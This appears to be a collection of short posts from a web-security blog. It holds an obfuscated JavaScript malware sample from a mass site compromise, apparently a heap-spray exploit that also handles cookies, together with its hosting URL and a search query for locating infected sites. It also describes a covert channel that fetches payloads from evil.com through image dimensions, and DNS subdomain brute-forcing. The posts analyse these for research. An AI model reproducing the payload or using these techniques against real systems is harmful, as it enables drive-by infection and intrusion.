Why is information security so dysfunctional? Are you wasting the money you spend on security? This book shows how to spend it more effectively. How can you make more effective security decisions? This book explains why professionals have taken to studying economics, not cryptography--and why you should, too. And why security breach notices are the best thing to ever happen to information security. It’s about time someone asked the biggest, toughest questions about information security. Security experts Adam Shostack and Andrew Stewart don’t just answer those questions--they offer honest, deeply troubling answers. They explain why these critical problems exist and how to solve them. Drawing on powerful lessons from economics and other disciplines, Shostack and Stewart offer a new way forward. In clear and engaging prose, they shed new light on the critical challenges that are faced by the security field. Whether you’re a CIO, IT manager, or security specialist, this book will open your eyes to new ways of thinking about--and overcoming--your most pressing security challenges. The New School enables you to take control, while others struggle with non-stop crises.null

Go Adam! Congrats on getting this out the door! We can exchange signed copies at RSA.

The New School of Information Security

McAfee is talking about a massive website compromise thats using JavaScript to drop malware. The attacker(s) is injecting tags into the title of the pages. McAfee researchers are jackholes who don't want to share the wealth and thus don't provide any links or insight into the code.

However, based on the vector the attackers are using (inejcting into <title> tag) the simple Google query intitle: <script src=http will show you the sites that are infected and where you can fetch code. Some of the websites serving the Malware require you to spoof a Referer header to receive the actual malware. Here is one example with a little pass through a JavaScript analyzer.

http://b.njnk.net:80/E/J.JS

var z1IlbQFl0X = 0;
var z1IlaxFl0X = 0;
var z1IlbPFl0X = 1;
var z1IlbiFl0X = 0;
var z1IlbCFl0X = 0;
var z1IlbHFl0X = 0;
var z1IlbIFl0X = 0;
var z1IlbfFl0X = "use" + "rid1" + "AF9122";
var z1IlbcFl0X = "20";
var z1IlaoFl0X = "a.n" + "jnk." + "net";
var z1IlbGFl0X = 0, z1IlbzFl0X = 0, z1IlaHFl0X = 0;
var z1IlaAFl0X = "";
var z1IlanFl0X = 0;
var z1IlapFl0X = 0, z1IlaOFl0X = 0, z1IlaKFl0X = 0, z1IlaLFl0X = 0;
var z1IlamFl0X = "n" + "one";
var z1IlcqFl0X;
var z1IlaSFl0X = 0;
{
    if(z1IlbQFl0X) {
        document.getElementsByTagName("bod" + "y") [ 0] .innerHTML += z1IlcFFl0X + "<b" + "r>";
        
    }
}
{
    if(z1IlbQFl0X) {
        alert(z1IlcFFl0X);
        
    }
}
function x0r1aU2Z(name) {
    var z1IlaFFl0X = document.cookie;
    var z1IlaJFl0X = name + "=";
    if(! z1IlaFFl0X) {
        return null;
        
    }
    var z1IlaDFl0X = z1IlaFFl0X.indexOf("; " + z1IlaJFl0X);
    if(z1IlaDFl0X == - 1) {
        z1IlaDFl0X = z1IlaFFl0X.indexOf(z1IlaJFl0X);
        if(z1IlaDFl0X != 0) {
            return null;
            
        }
    }
    else {
        z1IlaDFl0X += 2;
        
    }
    var z1IlbqFl0X = document.cookie.indexOf(";", z1IlaDFl0X);
    if(z1IlbqFl0X == - 1) {
        z1IlbqFl0X = z1IlaFFl0X.length;
        
    }
    return unescape(z1IlaFFl0X.substring(z1IlaDFl0X + z1IlaJFl0X.length, z1IlbqFl0X));
    
};
function x0r1aR2Z(name, value) {
    var exp = new Date();
    var z1IlbVFl0X = exp.getTime() + (365 * 1 * 24 * 60 * 60 * 1000);
    exp.setTime(z1IlbVFl0X);
    var z1IlbYFl0X = name + "=" + escape(value) + "; e" + "xpires" + "=" + exp.toGMTString();
    document.cookie = z1IlbYFl0X;
    
};
function x0r1ax2Z(z1IlakFl0X, z1IlalFl0X) {
    while(z1IlakFl0X.length * 2 < z1IlalFl0X) {
        z1IlakFl0X += z1IlakFl0X;
        
    }
    z1IlakFl0X = z1IlakFl0X.substring(0, z1IlalFl0X / 2);
    return z1IlakFl0X;
    
};
function z1IltFl0X() {
    if(z1IlaSFl0X > 0) {
        return;
        
    }
    try {
        var z1IlbaFl0X = 0 x0c0c0c0c;
        var z1IlarFl0X = unescape("%" + "ueb55㍮%" + "u64c" + ... [ Read More (3.0k in body) ]
JavaScript from Mass Compromise

DOMTree.cs Line 84:

/// <summary>
/// recursive helper
/// </summary>
/// <param name="curr">curr DOM tree node</param>
/// <param name="token">Reflection Token</param>
/// <param name="locs">list of current reflections</param>
private void FindTokens(XmlNode curr, string token, ref List<ReflectedLocation> locs, string origParamVal) {

    ...

    if(i <= 0 ) 
    {
        //HANDLE CRAP HERE, which I should do, but I don't.
        //This is bad. Billy is a slacker.
    }

    ...

}

I've worked with someone in biz-dev for a while where he essentially interfaces with certain large companies and keeps senior management and research up to date on things the companies are working on that impact us.

There has been a slow and steady decline in the quality of these reports over the last year or so, to the point this person is literally forwarding me items directly from the company's RSS feeds.

... [sigh] ... So, I conducted an experiment where I subscribed to 3 RSS feeds and kill filed the biz-dev guy. The result? I'm actually receiving *more* up-to-date info then he was providing because I don't have the lag-time while he reformats other people's content into Digest-of-Company-X emails. Granted I'm missing his commentary but thats a trade-off I'm comfortable with.

Maybe that makes me rude, but I found a way to save the company $80k a year. Go figure.

If you haven't heard about the Optimus Maximus keyboard yet, you are missing out. Looking at screen shots of it over at Engadget I couldn't help but notice this picture:

Unless my eyes deceive me, thats a picture of the Russian lesbians from the band Tatu.

Why they are mapped to a keyboard key is an interesting question. But that's not half as interesting as what happens if you push that button.

Old timers here will know about the concept of bruteforcing DNS using the clues available..

i.e. zone transfers disabled, but u see that the NS and MX servers are called gandalf.company.com and elrond.company.com. Effectively trying frodo.company.com is going to make good sense..

To this end BidiBlah will do this automagically for u and tries to eek out info.. (a little while back i saw fierce-scanner pop up in a similar vein!)

Young Mr Wilkinson ran up against a company last night with disabled transfers, but the 2 DNS servers showed up as:

* asimov.company.com
* heinlein.company.com

A quick trip to wikipedia shows that both are american sci-fi authors.

Very cool! A DNS Bruter using Wikipedia/Google to attempt to find relationships between subdomains. Bruting is fairly straight forward, and the trick has always been what values you should try. I faced this challenge about a month ago when I wrote a DNS bruter. Over the last 3 years or so I've made something of a hobby of collecting massive sets of URLs. At last count I had just under 90 million. I mined these and created a list of the 1000 most common subdomains.

Not as sexy as Bidiblah, but effective.

Subdomain bruting and you!

Arshan over at Aspect posted something that sounds very familiar indeed over on his blog.

Disclaimer: I know this isn’t earth-shattering now when the sandbox isn’t there, but I think it’s cool that using image tags we can create a completely covert channel for bypassing the same origin policy and control browsers remotely. Just to be clear, this is not a traditional same-origin bypass where we’re on http://evil.com/ and we’re talking to http://mybank.com/. We’re talking about a hijacked client who’s in collusion with an evil server that wants to deliver the client some message, be it a code payload, instructions, etc. Can we restrict JavaScript from dynamically loading image tags? No more image pre-loading? I doubt it!

Here’s how it works.

* Client dynamically creates an Image() and points the source to http://evil.com/evil.cgi?password=somesecret
* Server responds with an image that has a 16 pixels tall and 1 pixel wide (16 represents in this phase the total length of the payload)
* Client then starts a loop that iterates 16/2 times:
o Client dynamically creates a new Image() and points the source to http://evil.com/evil.cgi?password=somesecret&i=
o The new image that has height x, width y
o Client appends ASCII character value of x onto payload string
o Client appends ASCII character value of y onto payload string
* Client now has authenticated, 16-length payload to do whatever they want with

Hehe. I was wondering when someone would talk about this! John Terrill and I looked at this back late 2006, early 2007 and took this alittle further than Arshan did. Here is what we came up with:

The carry capacity of a side channel is an important factor. Arshan's solution is not very good because of the limited capacity. How can we use dimenstions as a side channel and not have to send tens of kilobytes to transer a few bytes of data in the side channel? Thats the "$1,000,000 and a Monster Truck" question which started John and I researching.

Lets take GIF images. According to the spec, length and width are 16 bit integers, giving us 4 bytes of data. However if I need to send 0xFFFFFFFF it would suck to have to transmit an image that is 65535x65535. That would be huge. But GIFs are compressed right? Remember that JavaScript cannot access pixel data of the Image objects it creates, so we really don't care about whats in this picture. What if we make it all white? That should compress well. While it does, you are still sending ... [ Read More (0.5k in body) ]

Using Image Dimensions as a side channel

[sigh]

...

This whole "SideJacking" meme is especially annoying and amusing to me. I've had people contact me (neither Robert or Dave, mainly reporters and non-web infosec guys) asking my opionion on this dangerous attack. These are the same people have also said to me in the past that XSS isn't interesting because its just cookie theft and thats not very sexy.

...

SIDE JACKING IS COOKIE THEFT YOU JACKASS! [SMACK]

Why the hell are we still talking about this?

'SideJacking' is fucking retarded.

Apparently Symantec has thinks Jikto is a virus. Odd it doesn't care about Samy, Zanga, Adultspace, MySpace+Quicktime, XSS-Proxy, JS/Wonka, JS/Random, or the 15 other pieces of JavaScript malware I have on my box. In fact, Yamanner is the only other thing I have to store in ROT13 to prevent the AV from eatting it.

I wonder if DOMinatrix is next.

GET / HTTP/1.0
Host: blog.oreilly.com

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Jan 2008 03:26:19 GMT
Server: Apache
Location: http://blogs.oreilly.comdev/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 305

comdev? WTF? Perhaps an internal staging server?